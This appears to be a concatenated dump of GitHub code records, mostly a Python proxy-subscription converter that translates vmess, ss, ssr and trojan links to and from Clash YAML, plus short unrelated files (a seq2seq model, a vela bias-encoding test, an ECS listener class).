convert.yaml_decode(final_content)\n else:\n print('Please define right output type.')\n return '订阅内容解析错误'\n else:\n return '订阅内容解析错误'\n\n def format(sub_content,output=False): # 对链接文本(Base64, url, YAML)进行格式化处理, 输出节点的配置字典(Clash 配置), output 为真是输出 YAML 文本\n if '' not in sub_content:\n if 'proxies:' not in sub_content: # 对 URL 内容进行格式化处理\n url_list = []\n try:\n if '://' not in sub_content:\n sub_content = convert.base64_decode(sub_content)\n\n raw_url_list = re.split(r'\\n+', sub_content)\n\n for url in raw_url_list:\n while len(re.split('ss://|ssr://|vmess://|trojan://|vless://', url)) > 2:\n url_to_split = url[8:]\n if 'ss://' in url_to_split and 'vmess://' not in url_to_split and 'vless://' not in url_to_split:\n url_splited = url_to_split.replace('ss://', '\\nss://', 1) # https://www.runoob.com/python/att-string-replace.html\n elif 'ssr://' in url_to_split:\n url_splited = url_to_split.replace('ssr://', '\\nssr://', 1)\n elif 'vmess://' in url_to_split:\n url_splited = url_to_split.replace('vmess://', '\\nvmess://', 1)\n elif 'trojan://' in url_to_split:\n url_splited = url_to_split.replace('trojan://', '\\ntrojan://', 1)\n elif 'vless://' in url_to_split:\n url_splited = url_to_split.replace('vless://', '\\nvless://', 1)\n url_split = url_splited.split('\\n')\n\n front_url = url[:8] + url_split[0]\n url_list.append(front_url)\n url = url_split[1]\n\n url_list.append(url)\n\n url_content = '\\n'.join(url_list)\n return convert.yaml_encode(url_content,output=False)\n except:\n print('Sub_content 格式错误')\n return '订阅内容解析错误'\n\n elif 'proxies:' in sub_content: # 对 Clash 内容进行格式化处理\n try:\n try_load = yaml.safe_load(sub_content)\n if output:\n raise ValueError\n else:\n content_yaml_dic = try_load\n for item in content_yaml_dic['proxies']:# 对转换过程中出现的不标准配置格式转换\n try:\n if item['type'] == 'vmess' and 'HOST' in item['ws-headers'].keys():\n item['ws-headers']['Host'] = item['ws-headers'].pop(\"HOST\")\n except KeyError:\n if '.' not in item['server']:\n content_yaml_dic['proxies'].remove(item)\n pass\n return content_yaml_dic # 返回字典, output 值为 True 时返回修饰过的 YAML 文本\n except Exception:\n try:\n sub_content = sub_content.replace('\\'', '').replace('\"', '')\n url_list = []\n il_chars = ['|', '?', '[', ']', '@', '!', '%', ':']\n lines = re.split(r'\\n+', sub_content)\n line_fix_list = []\n for line in lines:\n value_list = re.split(r': |, ', line)\n if len(value_list) > 6:\n value_list_fix = []\n for value in value_list:\n for char in il_chars:\n value_il = False\n if char in value:\n value_il = True\n break\n if value_il == True and ('{' not in value and '}' not in value):\n value = '\"' + value + '\"'\n value_list_fix.append(value)\n elif value_il == True and '}' in value:\n if '}}' in value:\n host_part = value.replace('}}','')\n host_value = '\"'+host_part+'\"}}'\n value_list_fix.append(host_value)\n elif '}}' not in value:\n host_part = value.replace('}','')\n host_value = '\"'+host_part+'\"}'\n value_list_fix.append(host_value)\n else:\n value_list_fix.append(value)\n line_fix = line\n for index in range(len(value_list_fix)):\n line_fix = line_fix.replace(value_list[index], value_list_fix[index])\n line_fix_list.append(line_fix)\n elif len(value_list) == 2:\n value_list_fix = []\n for value in value_list:\n for char in il_chars:\n value_il = False\n if char in value:\n value_il = True\n break\n if value_il == True:\n value = '\"' + value + '\"'\n value_list_fix.append(value)\n line_fix = line\n for index in range(len(value_list_fix)):\n line_fix = line_fix.replace(value_list[index], value_list_fix[index])\n line_fix_list.append(line_fix)\n elif len(value_list) == 1:\n if ':' in line:\n line_fix_list.append(line)\n else:\n line_fix_list.append(line)\n\n sub_content = '\\n'.join(line_fix_list).replace('False', 'false').replace('True', 'true')\n if output:\n return sub_content\n else:\n content_yaml_dic = yaml.safe_load(sub_content)\n for item in content_yaml_dic['proxies']:# 对转换过程中出现的不标准配置格式转换\n try:\n if item['type'] == 'vmess' and 'HOST' in item['ws-headers'].keys():\n item['ws-headers']['Host'] = item['ws-headers'].pop(\"HOST\")\n except KeyError:\n if '.' not in item['server']:\n content_yaml_dic['proxies'].remove(item)\n pass\n\n return content_yaml_dic # 返回字典, output 值为 True 时返回修饰过的 YAML 文本\n except:\n print('Sub_content 格式错误')\n return '订阅内容解析错误'\n else:\n print('订阅内容解析错误')\n return '订阅内容解析错误'\n \n def makeup(input, dup_rm_enabled=False, format_name_enabled=False): # 输入节点配置字典, 对节点进行区域的筛选和重命名,输出 YAML 文本 \n # 区域判断(Clash YAML): https://blog.csdn.net/CSDN_duomaomao/article/details/89712826 (ip-api)\n if isinstance(input, dict):\n sub_content = input\n else:\n sub_content = convert.format(input)\n proxies_list = sub_content['proxies']\n \n if dup_rm_enabled: # 去重\n begin = 0\n raw_length = len(proxies_list)\n length = len(proxies_list)\n while begin < length:\n if (begin + 1) == 1:\n print(f'\\n-----去重开始-----\\n起始数量{length}')\n elif (begin + 1) % 100 == 0:\n print(f'当前基准{begin + 1}-----当前数量{length}')\n elif (begin + 1) == length and (begin + 1) % 100 != 0:\n repetition = raw_length - length\n print(f'当前基准{begin + 1}-----当前数量{length}\\n重复数量{repetition}\\n-----去重完成-----\\n')\n proxy_compared = proxies_list[begin]\n\n begin_2 = begin + 1\n while begin_2 <= (length - 1):\n\n if proxy_compared['server'] == proxies_list[begin_2]['server'] and proxy_compared['port'] == proxies_list[begin_2]['port']:\n proxies_list.pop(begin_2)\n length -= 1\n begin_2 += 1\n begin += 1\n\n url_list = []\n\n for proxy in proxies_list: # 改名\n if format_name_enabled:\n emoji = {\n 'AD': '🇦🇩', 'AE': '🇦🇪', 'AF': '🇦🇫', 'AG': '🇦🇬', \n 'AI': '🇦🇮', 'AL': '🇦🇱', 'AM': '🇦🇲', 'AO': '🇦🇴', \n 'AQ': '🇦🇶', 'AR': '🇦🇷', 'AS': '🇦🇸', 'AT': '🇦🇹', \n 'AU': '🇦🇺', 'AW': '🇦🇼', 'AX': '🇦🇽', 'AZ': '🇦🇿', \n 'BA': '🇧🇦', 'BB': '🇧🇧', 'BD': '🇧🇩', 'BE': '🇧🇪', \n 'BF': '🇧🇫', 'BG': '🇧🇬', 'BH': '🇧🇭', 'BI': '🇧🇮', \n 'BJ': '🇧🇯', 'BL': '🇧🇱', 'BM': '🇧🇲', 'BN': '🇧🇳', \n 'BO': '🇧🇴', 'BQ': '🇧🇶', 'BR': '🇧🇷', 'BS': '🇧🇸', \n 'BT': '🇧🇹', 'BV': '🇧🇻', 'BW': '🇧🇼', 'BY': '🇧🇾', \n 'BZ': '🇧🇿', 'CA': '🇨🇦', 'CC': '🇨🇨', 'CD': '🇨🇩', \n 'CF': '🇨🇫', 'CG': '🇨🇬', 'CH': '🇨🇭', 'CI': '🇨🇮', \n 'CK': '🇨🇰', 'CL': '🇨🇱', 'CM': '🇨🇲', 'CN': '🇨🇳', \n 'CO': '🇨🇴', 'CR': '🇨🇷', 'CU': '🇨🇺', 'CV': '🇨🇻', \n 'CW': '🇨🇼', 'CX': '🇨🇽', 'CY': '🇨🇾', 'CZ': '🇨🇿', \n 'DE': '🇩🇪', 'DJ': '🇩🇯', 'DK': '🇩🇰', 'DM': '🇩🇲', \n 'DO': '🇩🇴', 'DZ': '🇩🇿', 'EC': '🇪🇨', 'EE': '🇪🇪', \n 'EG': '🇪🇬', 'EH': '🇪🇭', 'ER': '🇪🇷', 'ES': '🇪🇸', \n 'ET': '🇪🇹', 'EU': '🇪🇺', 'FI': '🇫🇮', 'FJ': '🇫🇯', \n 'FK': '🇫🇰', 'FM': '🇫🇲', 'FO': '🇫🇴', 'FR': '🇫🇷', \n 'GA': '🇬🇦', 'GB': '🇬🇧', 'GD': '🇬🇩', 'GE': '🇬🇪', \n 'GF': '🇬🇫', 'GG': '🇬🇬', 'GH': '🇬🇭', 'GI': '🇬🇮', \n 'GL': '🇬🇱', 'GM': '🇬🇲', 'GN': '🇬🇳', 'GP': '🇬🇵', \n 'GQ': '🇬🇶', 'GR': '🇬🇷', 'GS': '🇬🇸', 'GT': '🇬🇹', \n 'GU': '🇬🇺', 'GW': '🇬🇼', 'GY': '🇬🇾', 'HK': '🇭🇰', \n 'HM': '🇭🇲', 'HN': '🇭🇳', 'HR': '🇭🇷', 'HT': '🇭🇹', \n 'HU': '🇭🇺', 'ID': '🇮🇩', 'IE': '🇮🇪', 'IL': '🇮🇱', \n 'IM': '🇮🇲', 'IN': '🇮🇳', 'IO': '🇮🇴', 'IQ': '🇮🇶', \n 'IR': '🇮🇷', 'IS': '🇮🇸', 'IT': '🇮🇹', 'JE': '🇯🇪', \n 'JM': '🇯🇲', 'JO': '🇯🇴', 'JP': '🇯🇵', 'KE': '🇰🇪', \n 'KG': '🇰🇬', 'KH': '🇰🇭', 'KI': '🇰🇮', 'KM': '🇰🇲', \n 'KN': '🇰🇳', 'KP': '🇰🇵', 'KR': '🇰🇷', 'KW': '🇰🇼', \n 'KY': '🇰🇾', 'KZ': '🇰🇿', 'LA': '🇱🇦', 'LB': '🇱🇧', \n 'LC': '🇱🇨', 'LI': '🇱🇮', 'LK': '🇱🇰', 'LR': '🇱🇷', \n 'LS': '🇱🇸', 'LT': '🇱🇹', 'LU': '🇱🇺', 'LV': '🇱🇻', \n 'LY': '🇱🇾', 'MA': '🇲🇦', 'MC': '🇲🇨', 'MD': '🇲🇩', \n 'ME': '🇲🇪', 'MF': '🇲🇫', 'MG': '🇲🇬', 'MH': '🇲🇭', \n 'MK': '🇲🇰', 'ML': '🇲🇱', 'MM': '🇲🇲', 'MN': '🇲🇳', \n 'MO': '🇲🇴', 'MP': '🇲🇵', 'MQ': '🇲🇶', 'MR': '🇲🇷', \n 'MS': '🇲🇸', 'MT': '🇲🇹', 'MU': '🇲🇺', 'MV': '🇲🇻', \n 'MW': '🇲🇼', 'MX': '🇲🇽', 'MY': '🇲🇾', 'MZ': '🇲🇿', \n 'NA': '🇳🇦', 'NC': '🇳🇨', 'NE': '🇳🇪', 'NF': '🇳🇫', \n 'NG': '🇳🇬', 'NI': '🇳🇮', 'NL': '🇳🇱', 'NO': '🇳🇴', \n 'NP': '🇳🇵', 'NR': '🇳🇷', 'NU': '🇳🇺', 'NZ': '🇳🇿', \n 'OM': '🇴🇲', 'PA': '🇵🇦', 'PE': '🇵🇪', 'PF': '🇵🇫', \n 'PG': '🇵🇬', 'PH': '🇵🇭', 'PK': '🇵🇰', 'PL': '🇵🇱', \n 'PM': '🇵🇲', 'PN': '🇵🇳', 'PR': '🇵🇷', 'PS': '🇵🇸', \n 'PT': '🇵🇹', 'PW': '🇵🇼', 'PY': '🇵🇾', 'QA': '🇶🇦', \n 'RE': '🇷🇪', 'RO': '🇷🇴', 'RS': '🇷🇸', 'RU': '🇷🇺', \n 'RW': '🇷🇼', 'SA': '🇸🇦', 'SB': '🇸🇧', 'SC': '🇸🇨', \n 'SD': '🇸🇩', 'SE': '🇸🇪', 'SG': '🇸🇬', 'SH': '🇸🇭', \n 'SI': '🇸🇮', 'SJ': '🇸🇯', 'SK': '🇸🇰', 'SL': '🇸🇱', \n 'SM': '🇸🇲', 'SN': '🇸🇳', 'SO': '🇸🇴', 'SR': '🇸🇷', \n 'SS': '🇸🇸', 'ST': '🇸🇹', 'SV': '🇸🇻', 'SX': '🇸🇽', \n 'SY': '🇸🇾', 'SZ': '🇸🇿', 'TC': '🇹🇨', 'TD': '🇹🇩', \n 'TF': '🇹🇫', 'TG': '🇹🇬', 'TH': '🇹🇭', 'TJ': '🇹🇯', \n 'TK': '🇹🇰', 'TL': '🇹🇱', 'TM': '🇹🇲', 'TN': '🇹🇳', \n 'TO': '🇹🇴', 'TR': '🇹🇷', 'TT': '🇹🇹', 'TV': '🇹🇻', \n 'TW': '🇹🇼', 'TZ': '🇹🇿', 'UA': '🇺🇦', 'UG': '🇺🇬', \n 'UM': '🇺🇲', 'US': '🇺🇸', 'UY': '🇺🇾', 'UZ': '🇺🇿', \n 'VA': '🇻🇦', 'VC': '🇻🇨', 'VE': '🇻🇪', 'VG': '🇻🇬', \n 'VI': '🇻🇮', 'VN': '🇻🇳', 'VU': '🇻🇺', 'WF': '🇼🇫', \n 'WS': '🇼🇸', 'XK': '🇽🇰', 'YE': '🇾🇪', 'YT': '🇾🇹', \n 'ZA': '🇿🇦', 'ZM': '🇿🇲', 'ZW': '🇿🇼', \n 'RELAY': '🏁',\n 'NOWHERE': '🇦🇶',\n }\n\n server = proxy['server']\n if server.replace('.','').isdigit():\n ip = server\n else:\n try:\n ip = socket.gethostbyname(server) # https://cloud.tencent.com/developer/article/1569841\n except Exception:\n ip = server\n\n with geoip2.database.Reader('./utils/Country.mmdb') as ip_reader:\n try:\n response = ip_reader.country(ip)\n country_code = response.country.iso_code\n except Exception:\n ip = '0.0.0.0'\n country_code = 'NOWHERE'\n\n if country_code == 'CLOUDFLARE':\n country_code = 'RELAY'\n elif country_code == 'PRIVATE':\n country_code = 'RELAY'\n\n if country_code in emoji:\n name_emoji = emoji[country_code]\n else:\n name_emoji = emoji['NOWHERE']\n\n proxy_index = proxies_list.index(proxy)\n if len(proxies_list) >= 999:\n proxy['name'] = f'{name_emoji}{country_code}-{ip}-{proxy_index:0>4d}'\n elif len(proxies_list) <= 999 and len(proxies_list) > 99:\n proxy['name'] = f'{name_emoji}{country_code}-{ip}-{proxy_index:0>3d}'\n elif len(proxies_list) <= 99:\n proxy['name'] = f'{name_emoji}{country_code}-{ip}-{proxy_index:0>2d}'\n\n if proxy['server'] != '127.0.0.1':\n proxy_str = str(proxy)\n url_list.append(proxy_str)\n elif format_name_enabled == False:\n if proxy['server'] != '127.0.0.1': # 防止加入无用节点\n proxy_str = str(proxy)\n url_list.append(proxy_str)\n\n yaml_content_dic = {'proxies': url_list}\n yaml_content_raw = yaml.dump(yaml_content_dic, default_flow_style=False, sort_keys=False, allow_unicode=True, width=750, indent=2) # yaml.dump 显示中文方法 https://blog.csdn.net/weixin_41548578/article/details/90651464 yaml.dump 各种参数 https://blog.csdn.net/swinfans/article/details/88770119\n yaml_content = convert.format(yaml_content_raw,output=True)\n \n return yaml_content # 输出 YAML 格式文本\n\n def yaml_encode(url_content,output=True): # 将 URL 内容转换为 YAML 文本, output 为 False 时输出节点配置字典\n url_list = []\n\n lines = re.split(r'\\n+', url_content)\n\n for line in lines:\n yaml_url = {}\n if 'vmess://' in line:\n try:\n vmess_json_config = json.loads(convert.base64_decode(line.replace('vmess://', '')))\n vmess_default_config = {\n 'v': 'Vmess Node', 'ps': 'Vmess Node', 'add': '0.0.0.0', 'port': 0, 'id': '',\n 'aid': 0, 'scy': 'auto', 'net': '', 'type': '', 'host': vmess_json_config['add'], 'path': '/', 'tls': ''\n }\n vmess_default_config.update(vmess_json_config)\n vmess_config = vmess_default_config\n\n yaml_url = {}\n #yaml_config_str = ['name', 'server', 'port', 'type', 'uuid', 'alterId', 'cipher', 'tls', 'skip-cert-verify', 'network', 'ws-path', 'ws-headers']\n #vmess_config_str = ['ps', 'add', 'port', 'id', 'aid', 'scy', 'tls', 'net', 'host', 'path']\n # 生成 yaml 节点字典\n if vmess_config['id'] == '' or vmess_config['id'] is None:\n print('节点格式错误')\n else:\n yaml_url.setdefault('name', urllib.parse.unquote(str(vmess_config['ps'])))\n yaml_url.setdefault('server', vmess_config['add'])\n yaml_url.setdefault('port', int(vmess_config['port']))\n yaml_url.setdefault('type', 'vmess')\n yaml_url.setdefault('uuid', vmess_config['id'])\n yaml_url.setdefault('alterId', int(vmess_config['aid']))\n yaml_url.setdefault('cipher', vmess_config['scy'])\n yaml_url.setdefault('skip-cert-verify', True)\n if vmess_config['net'] == '' or vmess_config['net'] is False or vmess_config['net'] is None:\n yaml_url.setdefault('network', 'tcp')\n else:\n yaml_url.setdefault('network', vmess_config['net'])\n if vmess_config['path'] == '' or vmess_config['path'] is False or vmess_config['path'] is None:\n yaml_url.setdefault('ws-path', '/')\n else:\n yaml_url.setdefault('ws-path', vmess_config['path'])\n if vmess_config['net'] == 'h2' or vmess_config['net'] == 'grpc':\n yaml_url.setdefault('tls', True)\n elif vmess_config['tls'] == '' or vmess_config['tls'] is False or vmess_config['tls'] is None:\n yaml_url.setdefault('tls', False)\n else:\n yaml_url.setdefault('tls', True)\n if vmess_config['host'] == '':\n yaml_url.setdefault('ws-headers', {'Host': vmess_config['add']})\n else:\n yaml_url.setdefault('ws-headers', {'Host': vmess_config['host']})\n\n url_list.append(yaml_url)\n except Exception as err:\n print(f'yaml_encode 解析 vmess 节点发生错误: {err}')\n pass\n\n if 'ss://' in line and 'vless://' not in line and 'vmess://' not in line:\n if '#' not in line:\n line = line + '#SS%20Node'\n try:\n ss_content = line.replace('ss://', '')\n part_list = ss_content.split('#', 1) # https://www.runoob.com/python/att-string-split.html\n yaml_url.setdefault('name', urllib.parse.unquote(part_list[1]))\n if '@' in part_list[0]:\n mix_part = part_list[0].split('@', 1)\n method_part = convert.base64_decode(mix_part[0])\n server_part = f'{method_part}@{mix_part[1]}'\n else:\n server_part = convert.base64_decode(part_list[0])\n\n server_part_list = server_part.split(':', 1) # 使用多个分隔符 https://blog.csdn.net/shidamowang/article/details/80254476 https://zhuanlan.zhihu.com/p/92287240\n method_part = server_part_list[0]\n server_part_list = server_part_list[1].rsplit('@', 1)\n password_part = server_part_list[0]\n server_part_list = server_part_list[1].split(':', 1)\n\n yaml_url.setdefault('server', server_part_list[0])\n yaml_url.setdefault('port', server_part_list[1])\n yaml_url.setdefault('type', 'ss')\n yaml_url.setdefault('cipher', method_part)\n yaml_url.setdefault('password', password_part)\n\n url_list.append(yaml_url)\n except Exception as err:\n print(f'yaml_encode 解析 ss 节点发生错误: {err}')\n pass\n\n if 'ssr://' in line:\n try:\n ssr_content = convert.base64_decode(line.replace('ssr://', ''))\n \n parts = re.split(':', ssr_content)\n if len(parts) != 6:\n print('SSR 格式错误: %s' % ssr_content)\n password_and_params = parts[5]\n password_and_params = re.split('/\\?', password_and_params)\n password_encode_str = password_and_params[0]\n params = password_and_params[1]\n\n param_parts = re.split('\\&', params)\n param_dic = {}\n for part in param_parts:\n key_and_value = re.split('\\=', part)\n param_dic[key_and_value[0]] = key_and_value[1]\n yaml_url.setdefault('name', convert.base64_decode(param_dic['remarks']))\n yaml_url.setdefault('server', parts[0])\n yaml_url.setdefault('port', parts[1])\n yaml_url.setdefault('type', 'ssr')\n yaml_url.setdefault('cipher', parts[3])\n yaml_url.setdefault('password', convert.base64_decode(password_encode_str))\n yaml_url.setdefault('obfs', parts[4])\n yaml_url.setdefault('protocol', parts[2])\n yaml_url.setdefault('obfsparam', convert.base64_decode(param_dic['obfsparam']))\n yaml_url.setdefault('protoparam', convert.base64_decode(param_dic['protoparam']))\n yaml_url.setdefault('group', convert.base64_decode(param_dic['group']))\n\n url_list.append(yaml_url)\n except Exception as err:\n print(f'yaml_encode 解析 ssr 节点发生错误: {err}')\n pass\n\n if 'trojan://' in line:\n try:\n url_content = line.replace('trojan://', '')\n part_list = re.split('#', url_content, maxsplit=1) # https://www.runoob.com/python/att-string-split.html\n yaml_url.setdefault('name', urllib.parse.unquote(part_list[1]))\n\n server_part = part_list[0].replace('trojan://', '')\n server_part_list = re.split(':|@|\\?|&', server_part) # 使用多个分隔符 https://blog.csdn.net/shidamowang/article/details/80254476 https://zhuanlan.zhihu.com/p/92287240\n yaml_url.setdefault('server', server_part_list[1])\n yaml_url.setdefault('port', server_part_list[2])\n yaml_url.setdefault('type', 'trojan')\n yaml_url.setdefault('password', server_part_list[0])\n server_part_list = server_part_list[3:]\n\n for config in server_part_list:\n if 'sni=' in config:\n yaml_url.setdefault('sni', config[4:])\n elif 'allowInsecure=' in config or 'tls=' in config:\n if config[-1] == 0:\n yaml_url.setdefault('tls', False)\n elif 'type=' in config:\n if config[5:] != 'tcp':\n yaml_url.setdefault('network', config[5:])\n elif 'path=' in config:\n yaml_url.setdefault('ws-path', config[5:])\n elif 'security=' in config:\n if config[9:] != 'tls':\n yaml_url.setdefault('tls', False)\n\n yaml_url.setdefault('skip-cert-verify', True)\n\n url_list.append(yaml_url)\n except Exception as err:\n print(f'yaml_encode 解析 trojan 节点发生错误: {err}')\n pass\n\n yaml_content_dic = {'proxies': url_list}\n if output:\n yaml_content = yaml.dump(yaml_content_dic, default_flow_style=False, sort_keys=False, allow_unicode=True, width=750, indent=2)\n else:\n yaml_content = yaml_content_dic\n return yaml_content\n def base64_encode(url_content): # 将 URL 内容转换为 Base64\n base64_content = base64.b64encode(url_content.encode('utf-8')).decode('ascii')\n return base64_content\n\n def yaml_decode(url_content): # YAML 文本转换为 URL 链接内容\n try:\n if isinstance(url_content, dict):\n sub_content = url_content\n else:\n sub_content = convert.format(url_content)\n proxies_list = sub_content['proxies']\n\n protocol_url = []\n for index in range(len(proxies_list)): # 不同节点订阅链接内容 https://github.com/hoochanlon/fq-book/blob/master/docs/append/srvurl.md\n proxy = proxies_list[index]\n\n if proxy['type'] == 'vmess': # Vmess 节点提取, 由 Vmess 所有参数 dump JSON 后 base64 encode 得来。\n\n yaml_default_config = {\n 'name': 'Vmess Node', 'server': '0.0.0.0', 'port': 0, 'uuid': '', 'alterId': 0,\n 'cipher': 'auto', 'network': 'ws', 'ws-headers': {'Host': proxy['server']},\n 'ws-path': '/', 'tls': '', 'sni': ''\n }\n\n yaml_default_config.update(proxy)\n proxy_config = yaml_default_config\n\n vmess_value = {\n 'v': 2, 'ps': proxy_config['name'], 'add': proxy_config['server'],\n 'port': proxy_config['port'], 'id': proxy_config['uuid'], 'aid': proxy_config['alterId'],\n 'scy': proxy_config['cipher'], 'net': proxy_config['network'], 'type': None, 'host': proxy_config['ws-headers']['Host'],\n 'path': proxy_config['ws-path'], 'tls': proxy_config['tls'], 'sni': proxy_config['sni']\n }\n\n vmess_raw_proxy = json.dumps(vmess_value, sort_keys=False, indent=2, ensure_ascii=False)\n vmess_proxy = str('vmess://' + convert.base64_encode(vmess_raw_proxy) + '\\n')\n protocol_url.append(vmess_proxy)\n\n elif proxy['type'] == 'ss': # SS 节点提取, 由 ss_base64_decoded 部分(参数: 'cipher', 'password', 'server', 'port') Base64 编码后 加 # 加注释(URL_encode) \n ss_base64_decoded = str(proxy['cipher']) + ':' + str(proxy['password']) + '@' + str(proxy['server']) + ':' + str(proxy['port'])\n ss_base64 = convert.base64_encode(ss_base64_decoded)\n ss_proxy = str('ss://' + ss_base64 + '#' + str(urllib.parse.quote(proxy['name'])) + '\\n')\n protocol_url.append(ss_proxy)\n\n elif proxy['type'] == 'trojan': # Trojan 节点提取, 由 trojan_proxy 中参数再加上 # 加注释(URL_encode) # trojan Go https://p4gefau1t.github.io/trojan-go/developer/url/\n if 'tls' in proxy.keys() and 'network' in proxy.keys():\n if proxy['tls'] == True and proxy['network'] != 'tcp':\n network_type = proxy['network']\n trojan_go = f'?security=tls&type={network_type}&headerType=none'\n elif proxy['tls'] == False and proxy['network'] != 'tcp':\n trojan_go = f'??allowInsecure=0&type={network_type}&headerType=none'\n else:\n trojan_go = '?allowInsecure=1'\n if 'sni' in proxy.keys():\n trojan_go = trojan_go+'&sni='+proxy['sni']\n trojan_proxy = str('trojan://' + str(proxy['password']) + '@' + str(proxy['server']) + ':' + str(proxy['port']) + trojan_go + '#' + str(urllib.parse.quote(proxy['name'])) + '\\n')\n protocol_url.append(trojan_proxy)\n \n elif proxy['type'] == 'ssr': # ssr 节点提取, 由 ssr_base64_decoded 中所有参数总体 base64 encode\n remarks = convert.base64_encode(proxy['name']).replace('+', '-')\n server = proxy['server']\n port = str(proxy['port'])\n password = convert.base64_encode(proxy['password'])\n cipher = proxy['cipher']\n protocol = proxy['protocol']\n obfs = proxy['obfs']\n for key in {'group', 'obfsparam', 'protoparam'}:\n if key in proxy:\n if key == 'group':\n group = convert.base64_encode(proxy[key])\n elif key == 'obfsparam':\n obfsparam = convert.base64_encode(proxy[key])\n elif key == 'protoparam':\n protoparam = convert.base64_encode(proxy[key])\n else:\n if key == 'group':\n group = 'U1NSUHJvdmlkZXI'\n elif key == 'obfsparam':\n obfsparam = ''\n elif key == 'protoparam':\n protoparam = ''\n\n ssr_proxy = 'ssr://'+convert.base64_encode(server+':'+port+':'+protocol+':'+cipher+':'+obfs+':'+password+'/?group='+group+'&remarks='+remarks+'&obfsparam='+obfsparam+'&protoparam='+protoparam+'\\n')\n protocol_url.append(ssr_proxy)\n\n yaml_content = ''.join(protocol_url)\n return yaml_content\n except Exception as err:\n print(f'yaml decode 发生 {err} 错误')\n return '订阅内容解析错误'\n\n def base64_decode(url_content): # Base64 转换为 URL 链接内容\n if '-' in url_content:\n url_content = url_content.replace('-', '+')\n if '_' in url_content:\n url_content = url_content.replace('_', '/')\n #print(len(url_content))\n missing_padding = len(url_content) % 4\n if missing_padding != 0:\n url_content += '='*(4 - missing_padding) # 不是4的倍数后加= https://www.cnblogs.com/wswang/p/7717997.html\n try:\n base64_content = base64.b64decode(url_content.encode('utf-8')).decode('utf-8','ignore') # https://www.codenong.com/42339876/\n base64_content_format = base64_content\n return base64_content_format\n except UnicodeDecodeError:\n base64_content = base64.b64decode(url_content)\n base64_content_format = base64_content\n return str(base64_content)\n\n def convert_remote(url='', output_type='clash', host='http://127.0.0.1:25500'): #{url='订阅链接', output_type={'clash': 输出 Clash 配置, 'base64': 输出 Base64 配置, 'url': 输出 url 配置}, host='远程订阅转化服务地址'}\n # 使用远程订阅转换服务,输出相应配置。\n sever_host = host\n url = urllib.parse.quote(url, safe='') # https://docs.python.org/zh-cn/3/library/urllib.parse.html\n if output_type == 'clash':\n converted_url = sever_host+'/sub?target=clash&url='+url+'&insert=false&emoji=true&list=true'\n try:\n resp = requests.get(converted_url)\n except Exception as err:\n print(err)\n return 'Url 解析错误'\n if resp.text == 'No nodes were found!':\n sub_content = 'Url 解析错误'\n else:\n sub_content = convert.makeup(convert.format(resp.text), dup_rm_enabled=False, format_name_enabled=True)\n elif output_type == 'base64':\n converted_url = sever_host+'/sub?target=mixed&url='+url+'&insert=false&emoji=true&list=true'\n try:\n resp = requests.get(converted_url)\n except Exception as err:\n print(err)\n return 'Url 解析错误'\n if resp.text == 'No nodes were found!':\n sub_content = 'Url 解析错误'\n else:\n sub_content = convert.base64_encode(resp.text)\n elif output_type == 'url':\n converted_url = sever_host+'/sub?target=mixed&url='+url+'&insert=false&emoji=true&list=true'\n try:\n resp = requests.get(converted_url)\n except Exception as err:\n print(err)\n return 'Url 解析错误'\n if resp.text == 'No nodes were found!':\n sub_content = 'Url 解析错误'\n else:\n sub_content = resp.text\n\n return sub_content\n","repo_name":"mfuu/v2ray","sub_path":"utils/sub_convert.py","file_name":"sub_convert.py","file_ext":"py","file_size_in_byte":38742,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"60"} +{"seq_id":"12417216489","text":"from dataclasses import dataclass\n\nfrom ecs import Entity\n\nfrom src.engine.meme import Idea\nfrom src.engine.ai import Perception\n\n\n@dataclass\nclass Listener:\n trust_k: float = .9\n idea_weight_threshold: float = .5\n\n def use(self, subject, perception: Perception) -> list[Idea]:\n return [\n Idea(sound.idea.meme, sound.idea.weight * self.trust_k, sound.parent)\n for sound in perception.hearing.values()\n if sound is not None\n and sound.parent is not subject\n and sound.idea is not None\n and sound.idea.weight >= self.idea_weight_threshold\n ]\n","repo_name":"girvel/fallen","sub_path":"src/library/ai_modules/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41427220117","text":"import random\n\nimport numpy as np\n\nfrom ethosu.vela.api import npu_encode_bias\n\n\ndef test_encode_bias():\n bias_lower_limit = -(1 << (40 - 1))\n bias_upper_limit = (1 << (40 - 1)) - 1\n scale_lower_limit = 0\n scale_upper_limit = (1 << 32) - 1\n shift_lower_limit = 0\n shift_upper_limit = (1 << 6) - 1\n\n for _ in range(30):\n bias = np.int64(random.randint(bias_lower_limit, bias_upper_limit))\n scale = int(random.randint(scale_lower_limit, scale_upper_limit))\n shift = int(random.randint(shift_lower_limit, shift_upper_limit))\n biases_enc = npu_encode_bias(bias, scale, shift)\n assert isinstance(biases_enc, bytearray)\n assert len(biases_enc) == 10\n","repo_name":"nxp-imx/ethos-u-vela","sub_path":"ethosu/vela/test/extapi/test_extapi_encode_bias.py","file_name":"test_extapi_encode_bias.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"26788145895","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nimport sys\n\nclass Seq2seq(nn.Module):\n def __init__(self, encoder, decoder):\n super(Seq2seq, self).__init__()\n self.encoder = encoder\n self.decoder = decoder\n\n def flatten_parameters(self):\n self.encoder.rnn.flatten_parameters()\n self.decoder.rnn.flatten_parameters()\n\n def forward(self, input_variable, input_lengths=None, target_l_variables=None, \n target_x_variables=None, target_y_variables=None, target_w_variables=None, \n target_h_variables=None, is_training=0, early_stop_len=None):\n encoder_outputs, encoder_hidden = self.encoder(input_variable, input_lengths)\n result = self.decoder(encoder_hidden=encoder_hidden,\n encoder_outputs=encoder_outputs,\n target_l_variables=target_l_variables,\n target_x_variables=target_x_variables,\n target_y_variables=target_y_variables,\n target_w_variables=target_w_variables,\n target_h_variables=target_h_variables,\n is_training=is_training,\n early_stop_len=early_stop_len)\n return result\n","repo_name":"jamesli1618/Obj-GAN","sub_path":"box_generation/seq2seq/models/seq2seq.py","file_name":"seq2seq.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":286,"dataset":"github-code","pt":"60"} +{"seq_id":"70914929791","text":"def main():\n x1 = np.array([[0,0]])\n x2 = np.array([[0,1]])\n x3 = np.array([[1,0]])\n x4 = np.array([[1,1]])\n\n while True:\n w=np.random.randn(2,2)\n b=np.random.randn(2,)\n\n 